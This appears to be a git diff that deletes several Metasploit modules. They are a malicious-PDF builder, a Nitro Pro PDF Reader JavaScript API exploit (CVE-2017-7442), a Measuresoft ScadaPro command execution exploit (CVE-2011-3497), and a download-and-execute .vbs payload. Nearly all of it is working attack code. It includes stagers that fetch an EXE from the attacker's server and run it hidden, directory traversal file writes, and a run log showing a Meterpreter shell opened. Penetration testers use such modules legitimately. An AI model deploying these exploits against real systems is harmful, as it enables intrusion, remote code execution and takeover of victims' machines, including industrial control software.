|
||||
}
|
||||
|
||||
util.printd("#{rand4}", new Date());
|
||||
util.printd("#{rand5}", new Date());
|
||||
try {this.media.newPlayer(null);} catch(e) {}
|
||||
util.printd(#{rand3}, new Date());
|
||||
|
|
||||
|
||||
# Create the pdf
|
||||
pdf = make_pdf(script)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
|
||||
end
|
||||
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
|
||||
def make_pdf(js)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
pdf << "%%EOF" << eol
|
||||
|
||||
end
|
||||
end
|
|
@ -1,219 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
|
||||
PDF Reader version 11. The saveAs() Javascript API function allows for writing
|
||||
arbitrary files to the file system. Additionally, the launchURL() function allows
|
||||
an attacker to execute local files on the file system and bypass the security dialog
|
||||
|
||||
Note: This is 100% reliable.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
|
||||
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
|
||||
'sinn3r' # help with msf foo!
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-7442' ],
|
||||
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
|
||||
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => false
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# truly universal
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 24 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
deregister_options('SSL', 'SSLVersion', 'SSLCert')
|
||||
end
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
vbs = %Q|<head><hta:application
|
||||
applicationname="#{@payload_name}"
|
||||
border="none"
|
||||
borderstyle="normal"
|
||||
caption="false"
|
||||
contextmenu="false"
|
||||
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
|
||||
maximizebutton="false"
|
||||
minimizebutton="false"
|
||||
navigable="false"
|
||||
scroll="false"
|
||||
selection="false"
|
||||
showintaskbar="No"
|
||||
sysmenu="false"
|
||||
version="1.0"
|
||||
windowstate="Minimize"></head>
|
||||
<style>* { visibility: hidden; }</style>
|
||||
<script language="VBScript">
|
||||
window.resizeTo 1,1
|
||||
window.moveTo -2000,-2000
|
||||
</script>
|
||||
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
|
||||
<script language="VBScript">
|
||||
On Error Resume Next
|
||||
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
|
||||
#{name_xmlhttp}.open "GET","http://#{url}",False
|
||||
#{name_xmlhttp}.send
|
||||
Set #{name_adodb} = CreateObject("ADODB.Stream")
|
||||
#{name_adodb}.Open
|
||||
#{name_adodb}.Type=1
|
||||
#{name_adodb}.Write #{name_xmlhttp}.responseBody
|
||||
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
|
||||
set shellobj = CreateObject("wscript.shell")
|
||||
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
|
||||
</script>|
|
||||
vbs.gsub!(/ /,'')
|
||||
return vbs
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending second stage payload")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# In order to save binary data to the file system the payload is written to a .vbs
|
||||
# file and execute it from there.
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "/Windows/Temp"
|
||||
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
lhost = Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
lhost = datastore['SRVHOST']
|
||||
end
|
||||
payload_src = lhost
|
||||
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
pdf = %Q|%PDF-1.7
|
||||
4 0 obj
|
||||
<<
|
||||
/Length 0
|
||||
>>
|
||||
stream
|
||||
|
|
||||
pdf << build_vbs(payload_src, stager_name)
|
||||
pdf << %Q|
|
||||
endstream endobj
|
||||
5 0 obj
|
||||
<<
|
||||
/Type /Page
|
||||
/Parent 2 0 R
|
||||
/Contents 4 0 R
|
||||
>>
|
||||
endobj
|
||||
1 0 obj
|
||||
<<
|
||||
/Type /Catalog
|
||||
/Pages 2 0 R
|
||||
/OpenAction [ 5 0 R /Fit ]
|
||||
/Names <<
|
||||
/JavaScript <<
|
||||
/Names [ (EmbeddedJS)
|
||||
<<
|
||||
/S /JavaScript
|
||||
/JS (
|
||||
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
)
|
||||
>>
|
||||
]
|
||||
>>
|
||||
>>
|
||||
>>
|
||||
endobj
|
||||
2 0 obj
|
||||
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
|
||||
endobj
|
||||
3 0 obj
|
||||
<<>>
|
||||
endobj
|
||||
xref
|
||||
0 6
|
||||
0000000000 65535 f
|
||||
0000000166 00000 n
|
||||
0000000244 00000 n
|
||||
0000000305 00000 n
|
||||
0000000009 00000 n
|
||||
0000000058 00000 n
|
||||
trailer <<
|
||||
/Size 6
|
||||
/Root 1 0 R
|
||||
>>
|
||||
startxref
|
||||
327
|
||||
%%EOF|
|
||||
pdf.gsub!(/ /,'')
|
||||
file_create(pdf)
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
|
||||
[*] Processing scripts/nitro.rc for ERB directives.
|
||||
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
|
||||
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
|
||||
LHOST => 172.16.175.1
|
||||
resource (scripts/nitro.rc)> exploit
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.175.1:4444
|
||||
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
|
||||
[*] Using URL: http://0.0.0.0:8080/
|
||||
[*] Local IP: http://192.168.100.4:8080/
|
||||
[*] Server started.
|
||||
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
|
||||
[*] Sending stage (957487 bytes) to 172.16.175.232
|
||||
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
|
||||
[+] Deleted C:/Windows/Temp/UOIr.hta
|
||||
|
||||
msf exploit(nitro_reader_jsapi) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > shell
|
||||
Process 2412 created.
|
||||
Channel 2 created.
|
||||
Microsoft Windows [Version 6.1.7601]
|
||||
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||
|
||||
C:\Users\researcher\Desktop>
|
||||
=end
|
|
@ -1,126 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Measuresoft ScadaPro Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module allows remote attackers to execute arbitrary commands on the
|
||||
affected system by abusing via Directory Traversal attack when using the
|
||||
'xf' command (execute function). An attacker can execute system() from
|
||||
msvcrt.dll to upload a backdoor and gain remote code execution. This
|
||||
vulnerability affects version 4.0.0 and earlier.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Luigi Auriemma', # Initial discovery/poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf
|
||||
'TecR0c <tecr0c[at]tecninja.net>', # msf
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-3497'],
|
||||
[ 'OSVDB', '75490'],
|
||||
[ 'BID', '49613'],
|
||||
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
|
||||
[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
|
||||
# seemed pretty accurate to us ;)
|
||||
[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# truly universal
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Sep 16 2011'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(11234),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
end
|
||||
|
||||
# couldn't generate a vbs or exe payload and then use the wF command
|
||||
# as there is a limit to the amount of data to write to disk.
|
||||
# so we just write out a vbs script like the old days.
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
|
||||
tmp = "#{@temp_folder}/#{stager_name}"
|
||||
|
||||
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
|
||||
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
|
||||
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
|
||||
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
|
||||
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
|
||||
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
|
||||
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
|
||||
|
||||
return vbs
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending 2nd stage payload")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# In order to save binary data to the file system the payload is written to a .vbs
|
||||
# file and execute it from there.
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "C:/Windows/Temp"
|
||||
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
lhost = Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
lhost = datastore['SRVHOST']
|
||||
end
|
||||
|
||||
payload_src = lhost
|
||||
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
||||
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
stager = build_vbs(payload_src, stager_name)
|
||||
|
||||
path = "..\\..\\..\\..\\..\\windows\\system32"
|
||||
|
||||
createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
|
||||
download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"
|
||||
|
||||
print_status("Sending 1st stage payload...")
|
||||
|
||||
connect
|
||||
sock.get_once()
|
||||
sock.put(createvbs)
|
||||
sock.get_once()
|
||||
sock.put(download_execute)
|
||||
handler()
|
||||
disconnect
|
||||
|
||||
super
|
||||
end
|
||||
end
|
|
@ -1,72 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Executable Download and Execute (via .vbs)',
|
||||
'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
|
||||
'Author' => 'scriptjunkie',
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Handler' => Msf::Handler::None,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'wscript',
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
|
||||
OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
|
||||
OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
|
||||
OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
|
||||
])
|
||||
end
|
||||
|
||||
def generate
|
||||
return super + command_string
|
||||
end
|
||||
|
||||
def command_string
|
||||
# It's already long. Keep variable names short.
|
||||
vbsname = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
exename = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
streamvar = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
|
||||
command = ''
|
||||
command << "cmd.exe /q /c " if datastore['INCLUDECMD']
|
||||
# "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
|
||||
# disappears quickly before the wscript libraries load and the file downloads
|
||||
command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
|
||||
"#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
|
||||
"#{xmlhttpvar}.Send:"+
|
||||
"Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+
|
||||
"#{streamvar}.Type=1:"+
|
||||
"#{streamvar}.Open:"+
|
||||
"#{streamvar}.Write #{xmlhttpvar}.responseBody:"+
|
||||
"#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+
|
||||
"CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
|
||||
command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
|
||||
command << " >#{vbsname}.vbs"+
|
||||
"&start wscript #{vbsname}.vbs"
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue